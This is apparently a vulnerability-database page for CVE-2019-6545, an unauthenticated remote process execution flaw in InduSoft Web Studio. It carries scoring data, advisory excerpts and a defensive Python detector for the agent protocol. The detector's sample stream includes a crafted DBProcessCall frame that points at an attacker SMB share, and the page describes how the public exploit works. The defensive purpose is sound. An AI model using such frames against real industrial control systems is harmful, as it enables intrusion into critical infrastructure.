CVE-2019-6545
Published: 2019-02-13
Priority: P2 (63) · High · 7.5 (CVSS 3.1, AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
Exploit / EPSS: 13.86% (96.1th percentile)
AVEVA Software, LLC InduSoft Web Studio prior to Version 8.1 SP3 and InTouch Edge HMI (formerly InTouch Machine Edition) prior to Version 2017 Update. An unauthenticated remote user could use a specially crafted database connection configuration file to execute an arbitrary process on the server machine.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aveva | indusoft_web_studio | — | — |
| aveva | indusoft_web_studio | — | — |
| aveva | indusoft_web_studio | — | — |
| aveva | indusoft_web_studio | — | — |
| aveva | intouch_machine_edition_2014 | — | — |
Detection & IOCs (extracted from the sources below)
Byte patterns:
- \x02\x42 ... \x03 (DBProcessCall frame: STX, command byte 0x42, payload, ETX)
- \x02\x31\x10\x31\x10\x38\x10\x31\x10\x31\x03 (connection initialization handshake)
Detection rules:
- Detect unauthenticated DBProcessCall command 66 (0x42) messages on the InduSoft Web Studio agent port; the protocol frame starts with 0x02 0x42 and ends with 0x03.
- Alert on outbound SMB (TCP/445) connections originating from the InduSoft Web Studio process; this would indicate the agent is fetching a remote DB.xdc configuration file from an attacker-controlled SMB share.
- Monitor for the connection initialization handshake byte sequence 0x02 0x31 0x10 0x31 0x10 0x38 0x10 0x31 0x10 0x31 0x03 on the InduSoft agent port as a precursor to exploitation.
- Flag any UNC path arguments (e.g., \\<remote_ip>\<share>\DB) embedded in DBProcessCall messages; the exploit passes a remote SMB path to load the malicious DB.xdc file.
Notes:
- The public exploit uses an SMB share named 'LOLWAT' and serves a file named 'DB' (DB.xdc); the share name is attacker-controlled and will vary in real attacks, so do not rely solely on the share name for detection.
- CISA noted no known public exploits specifically targeted these vulnerabilities at advisory publication time (Feb 2019), but a public PoC was simultaneously released on Exploit-DB.
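The frame-level checks in the list above (DBProcessCall detection, the handshake precursor, and UNC paths inside DBProcessCall messages), as an added example that is not code from this page, from Tenable, or from AVEVA: a small Python parser that splits a captured byte stream on the STX (0x02) / ETX (0x03) framing the page quotes and raises an alert per suspicious frame. The frame layout (one command byte after STX, then 0x10-separated fields) is an assumption inferred from the handshake bytes; the page does not document escaping of 0x02/0x03 inside payloads, so none is handled, and it does not give the agent port, so the code takes raw bytes rather than sniffing. The sample traffic is constructed, reusing the share and file names the public PoC is reported to use.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

STX, ETX, SEP = 0x02, 0x03, 0x10   # frame start, frame end, field separator (SEP assumed from the handshake bytes)
CMD_DBPROCESSCALL = 0x42           # 'B' (decimal 66): the DBProcessCall command byte given on the page

# Exact connection-initialization handshake bytes quoted on the page.
INIT_HANDSHAKE = b"\x02\x31\x10\x31\x10\x38\x10\x31\x10\x31\x03"

# \\host\share... : host may not contain a backslash; the path ends at any
# control byte, so SEP (0x10) and ETX (0x03) terminate it.
UNC_RE = re.compile(rb"\\\\[^\\\x00-\x1f]+\\[^\x00-\x1f]+")


@dataclass
class Frame:
    cmd: int             # first byte after STX
    fields: list[bytes]  # SEP-separated payload fields after the command byte
    raw: bytes           # whole frame including STX and ETX


def parse_frames(stream: bytes) -> list[Frame]:
    """Split a byte stream into STX..ETX frames; bytes outside frames are ignored
    and an unterminated trailing frame is dropped (the caller should buffer it)."""
    frames: list[Frame] = []
    i = 0
    while True:
        start = stream.find(bytes([STX]), i)
        if start < 0:
            break
        end = stream.find(bytes([ETX]), start + 1)
        if end < 0:
            break
        body = stream[start + 1:end]
        if body:
            rest = body[1:]
            fields = rest.split(bytes([SEP])) if rest else []
            if fields and fields[0] == b"":
                fields = fields[1:]  # SEP directly after the command byte
            frames.append(Frame(cmd=body[0], fields=fields, raw=stream[start:end + 1]))
        i = end + 1
    return frames


def is_init_handshake(frame: Frame) -> bool:
    return frame.raw == INIT_HANDSHAKE


def unc_paths(data: bytes) -> list[str]:
    """Every \\\\host\\share... path embedded in a frame or payload."""
    return [m.decode("latin-1") for m in UNC_RE.findall(data)]


def inspect_stream(stream: bytes) -> list[str]:
    """One alert per suspicious frame, in stream order. A DBProcessCall carrying a
    UNC path is the exploit signature; a bare DBProcessCall is still reportable
    because the agent accepts it without authentication."""
    alerts: list[str] = []
    for frame in parse_frames(stream):
        if is_init_handshake(frame):
            alerts.append("INIT_HANDSHAKE")
        elif frame.cmd == CMD_DBPROCESSCALL:
            paths = unc_paths(frame.raw)
            alerts.append("DBPROCESSCALL_UNC " + " ".join(paths) if paths else "DBPROCESSCALL")
    return alerts


# Constructed sample (not a real capture): the page's handshake, a DBProcessCall
# whose first field points at the PoC's share/file names, then an unrelated frame.
SAMPLE_STREAM = (
    INIT_HANDSHAKE
    + b"\x02\x42\x10\\\\10.0.0.5\\LOLWAT\\DB\x10\x03"
    + b"\x02\x41\x10Tag1\x10\x03"
)

if __name__ == "__main__":
    for alert in inspect_stream(SAMPLE_STREAM):
        print(alert)
```

Feed it the TCP payload of a session to the agent port (for example, reassembled from a pcap) and treat INIT_HANDSHAKE followed by DBPROCESSCALL_UNC from a host that is not a known engineering workstation as a high-confidence hit; the share name in the path is attacker-controlled and is deliberately not part of the match.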
CVSS provenance
NVD v3.1: 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
NVD v2.0: 5.0 MEDIUM AV:N/AC:L/Au:N/C:N/I:P/A:N
Note that NVD scores only integrity impact (I:H, 7.5), whereas CISA's advisory ICSA-19-036-01 rates the same issue CVSS v3 9.8 and the GHSA entry labels it CRITICAL; the sources disagree on how to score unauthenticated arbitrary process execution on the server.
CISA ICS
AVEVA InduSoft Web Studio and InTouch Edge HMI
cisa_ics·2019-02-05·CVSS 9.8
[CRITICAL] AVEVA InduSoft Web Studio and InTouch Edge HMI
ICS Advisory
Last Revised: February 05, 2019
Alert Code: ICSA-19-036-01
## 1. EXECUTIVE SUMMARY
- CVSS v3 9.8
- ATTENTION: Exploitable remotely/low skill level to exploit
- Vendor: AVEVA Software, LLC (AVEVA)
- Equipment: InduSoft Web Studio and InTouch Edge HMI (formerly InTouch Machine Edition)
- Vulnerabilities: Missing Authentication for Critical Function, Resource Injection
## 2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow a remote attacker to execute an arbitrary process using a specially crafted database
GHSA
GHSA-pqwc-c6p6-66pq: AVEVA Software, LLC InduSoft Web Studio prior to Version 8
ghsa_unreviewed·2022-05-13
CVE-2019-6545 [CRITICAL] CWE-99 GHSA-pqwc-c6p6-66pq: AVEVA Software, LLC InduSoft Web Studio prior to Version 8
AVEVA Software, LLC InduSoft Web Studio prior to Version 8.1 SP3 and InTouch Edge HMI (formerly InTouch Machine Edition) prior to Version 2017 Update. An unauthenticated remote user could use a specially crafted database connection configuration file to execute an arbitrary process on the server machine.
No detection rules found.
Tenable
Remote Code Execution in InduSoft Web Studio
blogs_tenable·2019-02-06·CVSS 9.8
CVE-2019-6545 [CRITICAL] Remote Code Execution in InduSoft Web Studio
# Remote Code Execution in InduSoft Web Studio
Tenable Research
February 6, 2019
Enterprises running InduSoft Web Studio should update their software and ensure these critical systems are not exposed to the internet.
Tenable Research has discovered an unauthenticated remote code execution (RCE) vulnerability in InduSoft Web Studio 8.1.2.0. ICS-CERT has assigned CVE-2019-6545 and CVE-2019-6543 for this vulnerability.
### Background
InduSoft Web Studio is an automation tool for human-machine interface (HMI) and supervisory control and data acquisition (SCADA) systems. According to its website, Web Studio is used in manufacturing, oil and gas, municipal water and correctional facilities and even by a drag racer.
By exploiting this vulnerability, a